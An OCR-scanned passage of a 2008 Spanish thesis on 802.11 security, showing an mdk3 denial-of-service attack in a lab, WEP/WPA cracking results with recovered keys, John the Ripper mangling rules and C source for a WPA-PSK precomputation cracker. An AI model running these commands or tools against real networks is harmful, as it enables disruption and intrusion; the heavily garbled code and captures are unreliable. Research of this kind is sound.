Destacar la alta tasa de prueba 62.000 palabras/segundo para el primer caso y 29.000 
para el segundo. Un estudio de tiempos y resultados se realizara mas profundamente en el 
analisis de resultados. 



5.2.2.5 Ataque de Denegacion de Servicio 

• Objetivo: Conseguir que una estacion asociada al punto de acceso deje de 
estarlo, produciendo una denegacion de servicio en cuanto a la utilizacion de 
los recursos del AP. 

• Herramientas: MDK3 

• Victima: Punto de acceso con direccion MAC 00: 14:BF:BA y ESSID "dd- 
Pulas" 

• Metodologia: 

1. Poner el interfaz inalambrico en modo monitor, esto se realiza de forma 
automatica al lanzar el Airodump. 

2. Detectar la estacion objetivo en la lista mostrada por el Airodump 

3. Abrir otro terminal y lanzar la aplicacion Mdk3 en el modo de ataque 
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4. Observar como la estacion atacada deja de transmitir informacion, este 
resultado pude observarse en el Airodump. 

5. Abrir otro terminal y lanzar la aplicacion Mdk3 en el modo de ataque 
Michael 

6. Observar como la estacion atacada deja de transmitir informacion, este 
resultado pude observarse en el Airodump. 

Como es sabido, un ataque de denegacion de servicio siempre es posible contra 
cualquier tecnologia, en esta seccion trataremos de demostrar practicamente, que en protocolo 
de seguridad WPA no es una excepcion. Nos centraremos en dos puntos claves, el algoritmo 
control de integridad "Michael" como parte de TKIP y el protocolo de autenticacion 802. IX 
utilizado para transportar paquetes EAP. 

Para llevar a la practica ambos ataques de DoS, utilizaremos la aplicacion mdk3 
desarrollada por Pedro Larbig, ingeniero perteneciente a la universidad alemana de Darmstadt 
y cuyas estudios sobre el estandar 802. Hi permitieron crear una herramienta capaz de realizar 
multiples ataques de denegacion de servicio al protocolo WPA. 



Deteccion del objetivo y ataque 802. IX 

En primer lugar la aplicacion lanzada en su modo de DoS contra 802. IX permite 
inundar al punto de acceso con paquetes de inicio de autenticacion. Como se ha estado 
realizado hasta el momento en primera instancia lanzaremos la aplicacion Airodump con el 
objetivo de detectar el AP a ser atacado. Cabe hacer destacar que el escenario de test ha sido 
establecido en una maqueta preinstalada y preparada para la ocasion. Asi pues tanto el punto 
de acceso como la estacion que recibe el DoS estan controlados por el atacante. En este caso 
la salida del Airodump es la siguiente. 
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:h 11 ][ eie 


psed 


4 mins ] [ 


20 


38-01 


5SSID 




PUR RXQ 


Be 


aeons 


)0:13:10;92 




2 




424 


)0:13:49:F0 




1 




129 


)0:12:17:DD 




37 




1206 


)0:1B:2F:00 




S3 




1567 


)0:14:BF:BA 




88 




2714 


)0:14:BF:77 




1 




48 


>0:13;10;7A 




-1 







)0:04:E2:B9 









4 


SSSID 




STATION 






)0:13:10:7R 




00:80:5A 


:4F 




)0:13:10:7A 




00:13:E8 


:B3 




'not associs 


+pH"^ 


00:16:CF:AD 





J 11 




ULP 


UEP 




vharn y xo 


>« 


D 9 


54. 


UEP 


UEP 




ULAN 37 




D 11 


48 


UPA 


TKIP 


PSK 


antonio 




D 11 


54. 


UPA 


TKIP 


PSK 


cagarruta 




1 11 


48 


UPA 


TKIP 


PSK 


dd-Pulas 




3 11 


48 


UPA 


TKIP 


PSK 


GRAZZZ 




3 11 


-1 


0PN 






<len@th: 





3 13 


54. 


UEP 


UEP 




nitro 





PUR Rate Lost Packets Probes 



Uineless 



Figura 5.48: Deteccion del objetivo 

En este momento se selecciona el punto de acceso con direccion MAC 00:14:BF:BA y 
ESSK) "dd-Pulas" y se procede a lanzar la aplicacion mdk3 mediante la siguiente instruccion. 



Mdk3 ethl x -n dd-Pulas -t 00:14:BF:BA 



Consiguiendo en escasos segundos el siguiente resultado. 



DoSupa t 



;3 ethl x -n dd-Pulas -t 00:14:EF:Bfi 



ackets sent: 1 - Speed: 1 p 
^ot authentication frame: authentication was successful 

got authentication frame: authentication was successful 



Figura 5.49: Salida del MDK3 



La aplicacion en este momento colapsa el punto de acceso produciendo la desconexion 
de las estaciones asociadas al el. Una prueba de ello representa la STA con sistema operativo 
Windows 2000 y tarjeta inalambrica Conceptronic 54G asociada con el punto de acceso y 
cuyo estado se observa en la captura siguiente. 
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Wireless Network Config Utility 



Configuration Status 


Option | About | 












To connect to available WLAN. click Add to setup. 




Add 




Refresh | 










SSID 


MACfBSSIDl I Siqnal I Security 


CH I 


Freq 


Mode | ^ 




\ XUNGOS 

i SMC 

i WLAN_37 


00:19:5B:97:E7:B2 58S &=> WEP 
00:1 3: F7: 28:80:27 40% S=> WEP 
00:13:49:F0:DG:24 54% ©=> WEP 


1 
8 
9 


2.41 2Ghz 
2.437Ghz 
2.452Ghz 


g 
g 
g 




j dd-Pulas 


00:14:BF:BA:C0:E3 „# 100S ©=> WPA-PSK 


11 


2.462Ghz 


g 




i antonio 
i nitro 


00:12:17:DD:34:8E 46% ©=° WPA-PSK 
00:04:E2:B9:D7:04 Jp 42% ©» WEP 


11 
13 


2.4B2Ghz 
2.472Ghz 


g 

g 3 









-Profile Group Control- 
Please select a profile 


group to apply : 






New 






Rename 






Delete 


Select 







- Preferred WLANs: — 

Fixed connect to the selected profile: 



| SSID | Security 

p <J dd-Pulas £s> WPA-PS By 



Move to 



Remove 



Export 



Properties 



Import 



±J_ 



J .d 



Reconnect 



Aceptar 



Cancelar 



Aplicar 



■--,,-' Conexion de area local 5 

Cable de red desconectado 

|g>Mf|-|IMUft*m ■'m. & 13:13 



«S*@»31! 



Figura 5.50: Aplicacion cliente inaldmbrica 



Lanzando el ataque "Michael" y obteniendo resultados 



En segundo lugar se procede a realizar el ataque al protocolo de control de integridad 
"Michael" mediante el uso de la misma herramienta mdk3. Asi pues se procede como en el 
caso anterior a lanzar la aplicacion mediante la instruccion siguiente. 



Mdk3 ethl m -t 00:14:BF:BA 



Obteniendo como resultado la imagen mostrada a continuacion. 



trt DoSupa t mdk3 ethl 



>:14:BF:Bfl 



Packets sent: 



1 - Speed: 1 packets/sec 



Figura 5.51: Lanzando el MDK3 
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Produciendo como en el caso anterior la desconexion total de la estacion al punto de 



acceso. 




«S^®»9i3«L 



5.3 WPA2 



Figura 5.52: Aplicacion cliente inaldmbrica 



WPA2 representa la implementacion de la version final del estandar 802. Hi cuya 
principal diferencia en cuanto al desarrollo anterior (WPA) es la mejora del algoritmo de 
cifrado pasando de RC4 a AES. Esta mejora no imposibilita la realizacion de ataques de 
diccionario o fuerza bruta contra el protocolo, puesto que la carencia de seguridad en el 
saludo inicial o "4-wayhandshake" no se corrigio. De esta manera los estudios realizados en 
este proyecto sobre WPA son aplicables a WPA2. 
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6 Analisis de resultados 

Tras llevar a la practica las vulnerabilidades comentadas en la parte teorica es 
necesario establecer una serie de conclusiones resultado de los estudios realizados hasta el 
momento. Asi pues a continuacion se reflejan las conclusiones obtenidas en cuanto a los 
protocolos de cifrado analizados , asi como para las muestras obtenidas durante la captura de 
datos. 

6. 1 Analisis resultados WEP 

De los objetivos propuestos al realizar la demostracion practica de las diferentes 
vulnerabilidades que afectan a este protocolo, fueron cumplidos y conseguidos todos ellos. Es 
decir, se realizaron de forma satisfactoria ataques de tipo estadistico, de tipo inductivo y de 
denegacion de servicio. De estos resultados subrayar el hecho de que los ataques de tipo 
estadistico son capaces de recuperar la clave de cifrado de una manera rapida y fiable en 
practicamente todos los casos. Asi pues, centrandonos en este tipo de ataques, de los 8 puntos 
de acceso auditados de manera aleatoria y que utilizaban seguridad WEP, ha sido posible 
recuperar la clave de cifrado en un 100% de los casos. Los datos obtenidos reflejan la alta 
probabilidad de que un atacante pueda llegar a tener acceso a la red y a los datos de un AP 
que utiliza un protocolo de seguridad WEP como metodo de privacidad de sus recursos. Cabe 
destacar, por otro lado, la rapidez con que la que los ataques estadisticos son capaces de 
recuperar la clave de cifrado. La siguiente tabla refleja los tiempos (medidos en segundos) 
utilizados en las 8 capturas por la aplicacion "Aircrack" para conseguir la cadena secreta. 
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60 



M 



40 



30 



20 



10 




I Segundos/captura 



C1 C2 C3 C4 C5 C6 C7 



cs 



Figura 6.1: Segundos por captura 

Tal y como se puede apreciar en el grafico superior el tiempo necesario para conseguir 
la clave de cifrado no supera los 10 segundos en la mayoria de los casos. 

Hasta aqui los resultados analizados representan tan solo los ataques basados en 
tecnicas estadisticas, no obstante, de forma mas generalizada, la tabla resumen siguiente 
refleja los datos obtenidos en las demostraciones practicas para el resto de ataques 
comentados. 



Tipo de vulnerabilidad 


Numero de pruebas 


Numero de resultados 
producidos con exito 


Observaciones 


Estadistica 


8 


8 


Exito en el 100% de los 
casos 


Inductiva 


2 


2 


Ataque Arbaugh no llevado 
a la practica 


DoS 


1 


1 


Siempre es posible una DoS 


Diccionario/Fuerza bruta 


1 





No llevado a la practica con 
exito debido al calculo 
requerido 


Inyeccion 


1 


1 


Se demuestra que es posible 
la inyeccion. 



Tabla 6.1: Resultados ataques WEP 
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Al margen de los ataques estadisticos comentar brevemente la posibilidad de realizar 
denegaciones de servicio, utilizando para ello tanto fallos en el protocolo, como la emision de 
ruido en el canal utilizado para la comunicacion. 

Se desaconseja, por tanto, el uso de este protocolo de seguridad como metodo de 
proteccion de la informacion a no ser que sea estrictamente necesario. Destacar que siempre 
sera mejor hacer uso de sus servicios antes que mantener sin ningun tipo de medidas de 
seguridad los recursos a proteger. 

6.2 Analisis resultados WPA 

Es conveniente tener en cuenta a la hora de analizar los resultados obtenidos varios 
aspectos fundamentales del estudio realizado. Por una parte es importante realizar un analisis 
de los beneficios en cuanto a velocidad de calculo (palabras/segundo obtenida) con la 
aplicacion CalculaPMKl.l con respecto a las aplicaciones Aircrack, Cowpatty y 
CalculaPMKl.O. La siguiente grafica refleja los resultados obtenidos (palabras/segundo) en 
funcion de las maquinas utilizadas (Ghz) y las aplicaciones comparadas. 

palabras/seg 




■ Cowpatty 

■ CalculaPMKLO 
♦ CalculaPMKl.l 
V Aircrack 



2,13 Ghz 



2,33 Ghz 



2,66 Ghz 



3j00GhzDuo 



Figura 6. 2: Comparativa de aplicaciones 
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La aplicacion desarrollada CalculaPMKl.l consigue un aumento del rendimiento del 
400% sobre "Cowpatty" y al rededor de un 20 % con respecto a "Aircrack". Esta mejora de la 
tasa de pruebas nos ha permitido calcular la comentada tabla hash, para un diccionario de 
253.650.653 entradas en tan solo 11 dias de calculo ininterrumpido y para 14 ESSIDs 
distintos. Obteniendo aproximadamente el computo de un lote de un millon de palabras por 
hora. Pese a la mejora de rendimiento conseguida destacar, el bajo ratio de calculo que 
presentan este tipo de ataques. Esta vulnerabilidad fue en parte prevista, por los ingenieros 
desarrolladores de WPA obligando al algoritmo de generacion de la PMK a realizar sucesivos 
calculos (nada menos que 4096 iteraciones o llamadas a la funcion SHA-1), dotando al 
protocolo de un mayor nivel de robustez ante este tipo de ataques. El uso de tablas 
precomputadas hash o "RainBowTables" confieren la posibilidad de guardar el computo 
realizado obteniendo tasas de prueba de una magnitud muy superior como se observa en la 
grafica siguiente. 



Palabras.segundo 

100000 




60000 



♦ Cowpatty 



2.13 Ghz 



2.33 Ghz 



2,66 Ghz 



3.00 Ghz Duo 



Figura 6.3: Rendimiento de Cowpatty 

Por otra parte y como objetivo principal del estudio de la demostracion practica de la 
susceptibilidad del estandar 802.1 li a ser atacado mediante fuerza bruta o diccionario , a 
continuacion se presentan los resultados obtenidos de las estimaciones realizadas en cuanto a 
la posible PSK utilizada por el administrador del punto de acceso. Consiguiendo una tasa 
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media de unas 80.000 palabras por segundo y aplicando las tablas calculadas a las capturas de 
datos comentadas anteriormente, se ha podido testear las 253.650.653 entradas en tan solo 53 
minutos por captura, utilizando un unico computador. Los resultados del analisis se muestran 
el la tabla siguiente. 



Captura 


Resultado 


PSK 


Tiempo 


barcelo_public.cap 


Negativo 


- 


53 min 


dlink.cap 


Negativo 


- 


53 min 


eduroam.cap 


Negativo 


- 


53 min 


belkin54g.cap 


Negativo 


- 


53 min 


WLAN.cap 


Negativo 


- 


53 min 


NETGEAR.cap 


Negativo 


- 


53 min 


Motorola, cap 


Negativo 


- 


53 min 


Sinus TC300.cap 


Negativo 


- 


53 min 


WebSTAR.cap 


Negativo 


- 


53 min 


THOMSON.cap 


Negativo 


- 


53 min 


SMC.cap 


Positivo 


vgonzalez 


23,4 min 


Tele2.cap 


Negativo 


- 


53 min 


linksys.cap 


Positivo 


12345678 


3,1 min 


default, cap 


Positivo 


casablan 


41,3 min 



Tabla 6.2: Resultados WPA 



Pese a que a primera vista los resultados pueden ser poco alentadores desde el punto 
de vista del atacante destacar que se ha conseguido una tasa de acierto del 21,4 %, cuando en 
realidad esta deberia ser nula. De esta manera los resultados del analisis muestran que toda la 
robustez del protocolo en cierta forma recae en manos del administrador del punto de acceso, 
puesto que si la PSK seleccionada es debil (pertenece a un diccionario, es demasiado corta, 
demasiado evidente...) es posible obtener el secreto compartido. 

Al margen de los ataques de fuerza bruta y diccionario comentar brevemente la 
posibilidad de realizar denegaciones de servicio, utilizando para ello tanto fallos en el 
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protocolo, como la emision de ruido en el canal utilizado para la comunicacion. 

Es por ello que se puede concluir que el algoritmo de seguridad WPA representa un 
sistema que concede integridad y privacidad de una forma robusta siempre y cuando el fallo 
humano no implique una vulneracion del mismo. Asi pues destacar que una mala eleccion de 
la PSK por parte del administrador de la red puede permitir que un intruso tenga acceso a la 
red y a los recursos que esta ofrece. Por otra parte hay que tener en cuanta que para conseguir 
los resultados obtenidos, se ha de tener acceso a una tecnologia que ofrezca gran capacidad de 
calculo, no siendo alcanzable por el usuario domestico. 

6.3 Analisis resultados WPA2 

Puesto que WPA2 tan solo establece un cambio en el algoritmo de cifrado de la 
informacion y que las pruebas practicas para el protocolo WPA son completamente validas 
para el caso de WPA2, se concluye que el analisis de resultados para este protocolo es el 
realizado anteriormente. 

6.4 Analisis de la muestra y conclusiones 

La captura de datos en el escenario propuesto ofrecio la posibilidad de establecer una 
clasificacion del uso de los determinados metodos de cifrado por parte de las redes detectadas. 
Obteniendo cuatro grandes grupos de uso, redes abiertas "OPN", AP's con seguridad WEP, 
redes que hacen uso de WPA y puntos de acceso con WPA2. Estos datos reflejan el grado de 
seguridad de las conexiones inalambricas que utilizan el estandar IEEE802.il, estimando de 
esta forma la exposicion de riesgo de la poblacion que hace uso de este tipo de tecnologia. 

El siguiente grafico establece el porcentaje de uso de cada protocolo obtenido de una 
muestra de 2658 puntos de acceso tomada en el escenario de pruebas, con la siguiente 
distribucion. 
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• 538 puntos de acceso sin cifrado de datos 

• 1514 con seguridad WEP 

• 513 redes con el protocolo de seguridad WAP activado 

• 93 AP's que usan WPA2 





WPA-19W 



OPEN 
WEP 
WPA 
WPA2 



Figura 6. 4: Dispersion de protocolos 



Como se puede observar en el grafico superior, el 20 % de los puntos de acceso no 
contempla ningun tipo de cifrado de datos o control de acceso. El 57 % utiliza seguridad 
WEP, mientras que el 19 % hace uso de WPA en su punto de acceso inalambrico. En ultimo 
lugar aparece WPA2 con un escaso 3% de uso. 

• Tomando como base los analisis realizados para los diferentes protocolos de 
seguridad aplicables al estandar 802.11, podemos afirmar lo siguiente: 

• El 100% de los puntos de acceso que utilizan WEP son vulnerables a 
intrusiones no permitidas. 

• El 21,4 % de los AP que utilizan WPA como metodo de proteccion son 
vulnerables a intrusiones no deseadas. 



Roberto Amado Gimenez 
183 de 200 06/03/2008 



m 




Escola Tecnica Superior D'Enginyeria 
Analisis De La Seguridad En Redes 802.11 



El 21,4 % de los AP que utilizan WPA2 como metodo de proteccion son 
vulnerables a intrusiones. 

Obviamente todo punto de acceso que no implemente ningun protocolo de 
seguridad puede estar sometido a intrusiones no deseadas. 



Estas afirmaciones nos permiten medir la exposicion al riesgo tanto de la poblacion 
civil, como de las empresas e instituciones en la ciudad de Valencia obteniendo la siguiente 
estadistica. 



Vulnerable S2% 




No vulnerable 1SW 



No vulnerable 
Vulnerable 



Figura 6.5: Porcentaje de redes vulnerables 



Un 82 % de los puntos de acceso de la capital del Turia son vulnerables a intrusiones y 
robo de datos, la tecnologia permite mitigar considerablemente estas estadisticas (fue 
demostrado en los analisis realizados), lo que nos lleva a pensar que el problema radica en 
una falta de concienciacion por parte de los usuarios y administradores de red. En favor de 
ese porcentaje de poblacion que no utiliza un protocolo robusto como metodo preventivo, 
comentar que el estandar 802.11 contemplaba tan solo WEP como protocolo de seguridad, 
formandose a posteriori el grupo de trabajo 802. Hi como afiadido a la norma. Esto produce 
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que muchos de los dispositivos con tecnologia inalambrica WiFi tan solo dispongan de la 
posibilidad de utilizar WEP, sobretodo los que aparecieron en primera instancia, y sea muy 
complicado aplicarle nuevas capacidades como WPA o WPA2. Este escenario se encuentra 
con facilidad en entornos de produccion de las companias, agravando asi el problema, ya que 
supone una brecha de seguridad tremendamente explotable por sujetos maliciosos que 
pretendan obtener informacion confidencial o datos de especial valor para terceros 
(competencia, uso lucrativo personal). 

Por lo tanto y como conclusiones obtenidas tras el analisis realizado, si no se utiliza 
cifrado de datos , se debe activar un protocolo de seguridad robusto como WPA o WPA2 
siendo este ultimo mas aconsejable. En el caso de que el dispositivo no permita habilitar los 
protocolos anteriores, se sugiere la utilizacion de WEP extremando la seguridad en el entorno 
aplicado, complementando el uso del protocolo con otras medidas de seguridad como: 
segmentacion de la red , aislamiento de la subred inalambrica del resto de la red, utilizacion 
de firewalls, etc. Estas sugerencias de seguridad son fruto en parte, de la experiencia laboral 
del autor del proyecto tras numerosas auditorias de seguridad inalambrica y test de 
penetracion, realizadas a importantes companias, de sectores tan diversos como industrias 
textiles, ingenieria electronica, ferroviarias o de automocion. Obteniendo la posibilidad de 
penetrar, en la mayor parte de los casos, hasta el segmento de servidores corporativos 
simplemente sentado en el perimetro exterior de la compafiia auditada. 
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Anexo A 



CODIGO DE LAS REGLAS DE JOHN THE RIPPER 



l A [1a-z2-90] 



IQ A [A-Z] 



A [A-Z] 



l A ["-/:-@\[- , {-~] 



<9(?a[lc] A e A h A [tT] 



:9(?a[lc] A y A m A [aA] 



:9(?a[lc] A r A [mdMD] 



<9(?a[lc] A . A r A [mdMD] 



:9(?a[lc] A _ A _ 



<-!?Alp A [240-9] 



# Anadiendo un punto 



>3(?a[lc]i[12]. 



# Sustituyendo vocales 



/?v@?v>2l 



/?v@?v>2(?ac 



/?v@?v>2<*d 



# Creando sufijos 



<*l$[1-9!0a-z"-/:-@\[-'{-~] 



<*(?ac$[1-9!0a-z"-/:-@\R-~] 



<*lr$[1-9!] 



<7?au$[1-9!] 



<-!$!$! 



<-(?ac$!$! 



!$!<-$!$! 



(?ac$!<-$!$! 



>2x12 



>3x13 



>4x14 



>5x15 



>6x16 



>7x17 



>8x18 
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>3x22 



>4x23 



>5x24 



>6x25 



>7x26 



>8x27 



>9x28 



>4x32 



>5x33 



>6x34 



>7x35 



>8x36 



>9x37 



>2/?ulx12 



>3/?ulx13 



>4/?ulx14 



>5/?ulx15 



>6/?ulx16 



>7/?ulx17 



>8/?ulx18 



>3/?ulx22 



>4/?ulx23 



>5/?ulx24 



>6/?ulx25 



>7/?ulx26 



>8/?ulx27 



>9/?ulx28 



>4/?ulx32 



>5/?ulx33 



>6/?ulx34 



>7/?ulx35 



>8/?ulx36 



>9/?ulx37 



<*d 



re 



<*dMcQ 



>5/?ul'5 



uQ 



r(?al 
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<*!?A[lc]p 



<*cQd 



>7/?u'7 



>4I'4 



<+(?lcr 



i-r(?lcr 



>3'3 



>4/?u'4 



>3/?ul'3 



uQr 



<*IQf 



-s x 



-c (?acQ 



-clQ 



-s-c x**MIQ 



>6'6 



>7I7 



>6/?ul'6 



>5'5 



# Anadiendo prefijos y sufijos 



<-l A 1$1 



<-l A !$! 



<-l A @$(i 



<-l A #$# 



<-l A $$$ 



<-l A %$% 



<-| AA $ A 



<-l A &$& 



<-| A *$* 



<-l A ($) 



<-l A -$- 



<-| A =$= 



<-| A _$_ 



<-| A +$+ 



<-l A .$. 



<-l A ?$? 



<-l A {$} 



<-l A \[$] 
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<-l A <$> 



<-l A |$| 



<-l A :$: 



<-| A '$' 



<-| A "$" 



# Anadiendo numeracion como sufijo 



<-l$[63-5]$[0-9] 



<-(?ac$[63-5]$[0-9] 



(?a[lc]$0<-$0$7 



(?a[lc]$1<-$1$1 



(?a[lc]$1<-$2$3 



(?a[lc]$2<-$2$2 



(?a[lc]$3<-$3$3 



(?a[lc]$4<-$4$4 



(?a[lc]$5<-$5$5 



(?a[lc]$6<-$6$6 



(?a[lc]$7<-$7$7 



(?a[lc]$8<-$8$8 



(?a[lc]$9<-$9$9 



# Anadiendo fecha 



l$1<-$9$[7-96-0]>- 



l$2<-$0$0>- 



l$1$9<-$[7-9]$[0-9] 



l$2$0<-$0$[0-9] 



l$1$9<-$[6-0]$[9-0] 
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Anexo B 

CODIGO FUENTE "CALCULAPMK.C" 



CalculaPMK.c 



#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <limits.h> 
#include <unistd.h> 
#include <signal.h> 
#include <sys/time.h> 
#include "util.h" 
#include "pmk.h" 

#define PROGRAMA "calculaPMK" 
#define VERSION "1.1" 

static int bucle=1; 

void Salir(int senal) 

{ 

switch(senal) 

{ 

default: 

bucle=0; 
break; 
} 
} 

void Mensaje(char *mensaje) 

{ 

if (mensaje==NULL) 

{ 

fprintf(stderr,"\nUso: %s [opciones]\n\n", PROGRAMA); 
fprintf(stderr,"\t-f\tFichero diccionarioAn"); 
fprintf(stderr,"\t-d\tFichero hash de salidaAn"); 
fprintf(stderr,"\t-s\tSSID de la redAn"); 

} 
else 

fprintf(stderr,"%s: %s\n",PROGRAMA,mensaje); 

exit(0); 
} 

int main(int argc,char * argv[]) 

{ 

FILE*fpin,*fpout; 

charnfin[PATH_MAX+1],nfout[PATH_MAX+1]; 

struct CABECERA cab; 

struct PMK pmk; 

charssid[MAXSSID+1]; 

int c; 

unsigned long palabras; 
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struct timeval inicio.fin; 
float tiempo; 

printf("\n%s %s - Ataque de precomputacion WPA-PSK\n",PROGRAMA, VERSION); 

signal(SIGINT, Salir); 
signal(SIGTERM, Salir); 
signal(SIGQUIT, Salir); 

nfin[0]=nfout[0]=ssid[0]='\0'; 

while ((c=getopt(argc,argv,"f:d:s:h"))!=EOF) 

{ 

switch(c) 

{ 

case T: 

if (strlen(optarg)<=PATH_MAX) 

strcpy(nfin,optarg); 
break; 




case 'd': 



case s : 



case 'h': 



if (strlen(optarg)<=PATH_MAX) 

strcpy(nfout,optarg); 
break; 

if (strlen(optarg)<=MAXSSID) 

strcpy(ssid.optarg); 
break; 

Mensaje(NULL); 
break; 



} 

if (EsBlanco(nfin) || EsBlanco(nfout) || EsBlanco(ssid)) 
Mensaje(NULL); 

if (strcmp(nfin,"-")==0) 

{ 

printf("Usando STDIN como entradaAn"); 
fpin=stdin; 

} 
else 

if((fpin=fopen(nfin,"r"))==NULL) 

{ 

perrorffopen"); 

exit(0); 
} 



if((fpout=fopen(nfout,"rb"))==NULL) 

{ 

printffEl fichero %s no existe, creandolo...\n",nfout); 

if ((fpout=fopen(nfout,"wb"))==NULL) 

{ 

perror("fopen"); 

exit(0); 
} 

for(c=0;c<3;c++) 

cab.reservado[c]=0; 
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memset(cab.ssid,0,sizeof(cab.ssid)); 
cab.magico=GENPMKMAGIC; 
cab.longssid=strlen(ssid); 
memcpy(cab.ssid,ssid,cab.longssid); 

if (fwrite(&cab,sizeof(struct CABECERA),1,fpout)!=1) 

{ 

perror("fwrite"); 

exit(0); 
} 




} 
else 

{ 

if (fread(&cab,sizeof(struct CABECERA),1,fpout)!=1) 

Mensaje("Formato del fichero de salida incorrecto"); 

if (cab.magico!=GENPMKMAGIC) 

Mensaje("Fichero de salida no corresponde a PMK"); 

if (memcmp(cab.ssid,ssid,cab.longssid)!=0) 

Mensaje("SSID del fichero distinto del SSID especificado" 

printffEl fichero %s existe, ahadiendo datos\n",nfout); 

fclose(fpout); 

if ((fpout=fopen(nfout,"ab"))==NULL) 

{ 

perrorffopen"); 

fclose(fpin); 

exit(0); 
} 
} 

gettimeofday(&inicio,0); 

palabras=0; 

while (bucle &&fgets(pmk.clave,MAXCLAVE+1,fpin)!=NULL) 

{ 

if((c=strlen(pmk.clave)-1)<MINCLAVE) 
continue; 

pmk.clave[c]='\0'; 

if((++palabras%1000)==0) 

printf("Clave %ld: %s\n",palabras,pmk.clave); 

CalculaPMK(pm k. clave, ssid.&pmk.upmk); 

pmk.tam=c+sizeof(pmk.tam)+sizeof(pmk.upmk.pmk); 

fwrite(&pmk.tam,sizeof(pmk.tam),1,fpout); 
fwrite(pmk. clave, c,1,fpout); 

fwrite(pmk.upmk.pmk,sizeof(pmk.upmk.pmk),1,fpout); 
} 

fclose(fpin); 
fclose(fpout); 

gettimeofday(&fin,0); 

if (fin.tv_usec<inicio.tv_usec) 
{ 
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fin.tv_sec-; 

fin.tv usec+=1 000000; 




} 



fin.tv_sec-=inicio.tv_sec; 

fin.tv_usec-=inicio.tv_usec; 

tiempo= fin. tv_sec+fin.tv_usec/1 000000.0; 

printf("\n%lu claves procesadas en %.2f segundos: %.2f 
claves/segundo\n",palabras,tiempo,palabras/tiempo); 

return 0; 
} 



CODIGO FUENTE "CALCULAPMK.H" 

CalculaPMK.h 

#ifndef_DEFINE_H_ 

#define_DEFINE_H_ 

#define GENPMKMAGIC 0x43575041 

#defineMINCLAVE8 

#define MAXCLAVE 63 

#defineMAXSSID32 

#define TAMPMK 40 

#if _WORDSIZE==32 || _WORDSIZE==64 

#define TAMIPMKTAMPMK/sizeof(unsigned int) 

#else 

#error No es posible compilar el programa para 16 bits 

#endif 

struct CABECERA{ 

unsigned int magico; 
unsigned char reservado[3]; 
unsigned char longssid; 
unsigned char ssid[MAXSSID]; 

}; 

union UPMK{ 

unsigned int ipmk[TAMIPMK]; 
unsigned char pmk[TAMPMK]; 

}; 

struct PMK{ 

unsigned char tarn; 

char clave[MAXCLAVE+1]; 

union UPMK upmk; 

}; 

#endif 
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CODIGO FUENTE "MAKEFILE" 



II II II II II II II II II II II II II II II II II II II II II II II II II II II II II II m ## 

# Makefile # 

II II II II II II II II II II II II II II II II II II II II II II II II II II II II II II M M 

CFLAGS = -pipe -Wall -DOPENSSL 

CFLAGS += -03 

LDLIBS =-lcrypto 

CFLAGS += -g3 -ggdb 

PROGOBJ = util.o pmk.o 

PROG = calculaPMK 

all: $(PROGOBJ) $(PROG) 

calculaPMK: calculaPMK.c define. h util.h pmk.h 

$(CC) $(CFLAGS) calculaPMK.c -o calculaPMK util.o pmk.o $(LDLIBS) 

util: util.c util.h 

$(CC)$(CFLAGS)util.c-c 

pmk: pmk.c define. h pmk.h 
$(CC) $(CFLAGS) pmk.c -c 

clean: 

$(RM) $(PROGOBJ) $(PROG) *~ 

ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii t mm 

# PMK.c # 

II II II II II II II II II II II II II II II II II II II II II II II II II II II II II II M M 
#include <string.h> 
#include <openssl/hmac.h> 
#include <openssl/sha.h> 

#include "pmk.h" 

union UBUFFER{ 

unsigned int ibuffer[17]; 

unsigned char buffer[68]; /* Solo se utilizan 65 bytes */ 

}; 

void CalculaPMK(char *key,char *essid_pre, union UPMK *upmk) 

{ 

int ij.slen; 

union UBUFFER buffer; 

char essid[33+4]; 

SHA_CTXctx_ipad; 

SHA_CTX ctx_opad; 

SHA_CTXsha1_ctx; 

memset(essid,0,sizeof(essid)); 

memcpy(essid,essid_pre,strlen(essid_pre)); 

slen=strlen(essid)+4; 

memset(buffer. buffer, O.sizeof(buffer)); 
strncpy((char*)buffer. buffer, key, sizeof(buffer)); 

for(i=0;i<16;i++) 

buffer.ibuffer[i] A =0x36363636; 

SHA1_lnit(&ctx_ipad); 
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SHA1_Update(&ctx_ipad,buffer.buffer,64); 

for(i=0;i<16;i++) 

buffer.ibuffer[i] A = 0x6A6A6A6A; 

SHA1_lnit(&ctx_opad); 
SHA1_Update(&ctx_opad,buffer.buffer,64); 

essid[slen-1]='\1'; 

HMAC(EVP_sha1(), (unsigned char *)key,strlen(key), (unsigned char *)essid,slen,upmk->pmk,NULL); 

memcpy(buffer. buffer, upmk->pmk,20); 

for(i=1;i<4096;i++) 

{ 

memcpy(&sha1_ctx,&ctx_ipad,sizeof(sha1_ctx)); 

SHA1_Update(&sha1_ctx,buffer.buffer,20); 

SHA1_Final(buffer.buffer,&sha1_ctx); 

memcpy(&sha1_ctx,&ctx_opad,sizeof(sha1_ctx)); 

SHA1_Update(&sha1_ctx,buffer.buffer,20); 

SHA1_Final(buffer.buffer,&sha1_ctx); 



} 



forQ=0;j<5;j++) 

upmk->ipmk[j] A = buffer.ibufferO]; 



essid[slen-1]='\2'; 

HMAC(EVP_sha1(), (unsigned char *)key,strlen(key), (unsigned char *)essid,slen,upmk- 
>pmk+20,NULL); 

memcpy(buffer. buffer, upmk->pmk+20, 20); 

for(i=1;i<4096;i++) 

{ 

memcpy(&sha1_ctx,&ctx_ipad,sizeof(sha1_ctx)); 

SHA1_Update(&sha1_ctx,buffer.buffer,20); 

SHA1_Final(buffer.buffer,&sha1_ctx); 

memcpy(&sha1_ctx,&ctx_opad,sizeof(sha1_ctx)); 

SHA1_Update(&sha1_ctx,buffer.buffer,20); 

SHA1_Final(buffer.buffer,&sha1_ctx); 

forQ=0;j<5;j++) 

upmk->ipmk[j+5] A =buffer.ibuffer[j]; 



CODIGO FUENTE "PMK.H" 

II II II II II II II II II II II II II II II II II II II II II II II II II II II II II II t m## 

# PMK.h # 

II II II II II II II II II II II II II II II II II II II II II II II II II II II II II II M M 

#ifndef_PMK_H_ 

#define _PMK_H_ 

#include "define. h" 
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#ifdef cplusplus 

extern "C" { 
#endif 

void CalculaPMK(char *key,char *essid_pre, union UPMK *upmk); 

#ifdef cplusplus 

} 
#endif 

#endif 



CODIGO FUENTE "UTIL.C" 



ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii m m 

# util.c # 

II II II II II II II II II II II II II II II II II II II II II II II II II II II II II II M M 
